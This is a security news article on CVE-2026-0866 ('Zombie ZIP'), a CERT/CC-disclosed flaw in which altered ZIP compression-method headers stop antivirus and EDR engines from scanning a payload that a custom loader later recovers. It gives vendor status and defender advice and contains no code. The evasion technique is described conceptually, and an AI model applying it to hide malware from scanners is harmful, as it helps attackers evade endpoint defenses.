Malformed ZIP files can help malware slip past antivirus and EDR scans
5 min. read 
Published on
A newly disclosed archive-scanning weakness could help attackers hide malware inside specially crafted ZIP files and slip past some antivirus and EDR products. The issue, tracked as CVE-2026-0866, stems from malformed ZIP headers that can stop security tools from properly decompressing and inspecting the archive’s real contents.
CERT/CC says the problem can cause false negatives in antivirus and endpoint detection and response software. In its advisory, the organization warned that malformed ZIP headers can confuse security engines during preprocessing, which means the payload may never get scanned correctly at all.
The weakness sits in the way many scanners handle ZIP metadata. ZIP files carry fields such as compression method, flags, and version information, and CERT/CC says antivirus engines often rely on that metadata to decide how to unpack a file before scanning it. If an attacker tampers with the compression method field, the scanner may fail to decompress the archive and fail to inspect the real payload.
CERT/CC also says attackers can recover the hidden payload later with a custom loader that ignores the declared Method field and instead decompresses the embedded data directly. That allows the malicious content to stay hidden during the initial security scan while still remaining recoverable for later execution.
This does not mean every malformed ZIP will execute automatically. CERT/CC notes that many standard extraction tools, including 7-Zip, unzip, bsdtar, and Python’s zipfile, trust the bogus metadata and then fail with CRC or unsupported method errors. In other words, the archive often looks broken to normal software, but a tailored loader can still revive the concealed payload.
That combination makes the issue useful for evasion. A malformed archive can look corrupted to everyday tools while also reducing the chance that automated scanners ever inspect the real file hidden inside. CERT/CC says the tactic is similar to an older archive-scanning issue documented as CVE-2004-0935.
The researcher credited for the disclosure is Christopher Aziz. CERT/CC acknowledged Aziz in its advisory, and the public discussion around the issue has referred to the technique as “Zombie ZIP.”
What CERT/CC says happens
| Area | What the advisory says |
|---|---|
| Root issue | Malformed ZIP headers can trigger false negatives in AV and EDR |
| Main trick | Attackers modify ZIP metadata, especially the compression method field |
| Result | Security tools may fail to decompress and inspect the payload |
| Execution path | A custom loader can ignore the fake header and recover the payload |
| Normal tools | Standard extraction tools often fail with CRC or unsupported method errors |
Vendor status so far
CERT/CC’s vendor table does not show a broad set of confirmed patches yet. Cisco is listed as affected, and its statement says ClamAV is unable to scan this type of malformed ZIP file, though Cisco described the issue as a hardening suggestion rather than a conventional product vulnerability. Many other vendors listed by CERT/CC still showed unknown status when the note was published.
That means security teams should not assume their current archive-scanning stack handles this edge case safely. CERT/CC explicitly recommends contacting antivirus and EDR providers to confirm exposure and ask about mitigation guidance.
What defenders should do now
- Ask your antivirus and EDR vendors whether their archive-scanning engine is affected by CVE-2026-0866.
- Treat malformed or corrupted ZIP files as suspicious, especially if they come from email, web downloads, or unknown internal shares. This is an inference based on CERT/CC’s description of how the evasion works.
- Push vendors for stronger validation that compares declared ZIP metadata against the actual file content. CERT/CC says scanners should not rely only on archive metadata.
- Hunt for custom loaders or secondary unpacking routines in suspicious workflows, because CERT/CC says those may be needed to recover the hidden payload.
Why this matters
Archive files remain one of the most common ways to move malware through email and downloads. When a malformed ZIP can both confuse security products and frustrate standard extraction tools, it gives attackers a practical evasion method that can blend into everyday file-handling noise. That assessment is an inference, but it follows directly from CERT/CC’s description of false negatives and custom payload recovery.
The bigger issue is trust. Security engines often trust ZIP metadata enough to decide how to inspect a file. CVE-2026-0866 shows that if attackers can corrupt that trust boundary, they may not need a novel malware family to evade detection. They may only need a broken-looking archive and a loader that knows what is really inside.
FAQ
It is a vulnerability involving malformed ZIP metadata that can cause antivirus and EDR software to miss malicious payloads during archive scanning.
Often, no. CERT/CC says many standard extraction tools fail with CRC or unsupported method errors when they try to unpack these malformed archives.
CERT/CC says a custom loader can ignore the declared compression method and recover the embedded payload directly.
Yes. CERT/CC lists Cisco as affected, with a statement saying ClamAV cannot properly scan this type of malformed ZIP file. Many other vendors were still listed as unknown in the CERT note.
Read our disclosure page to find out how can you help VPNCentral sustain the editorial team Read more
Improve this guide
User forum
0 messages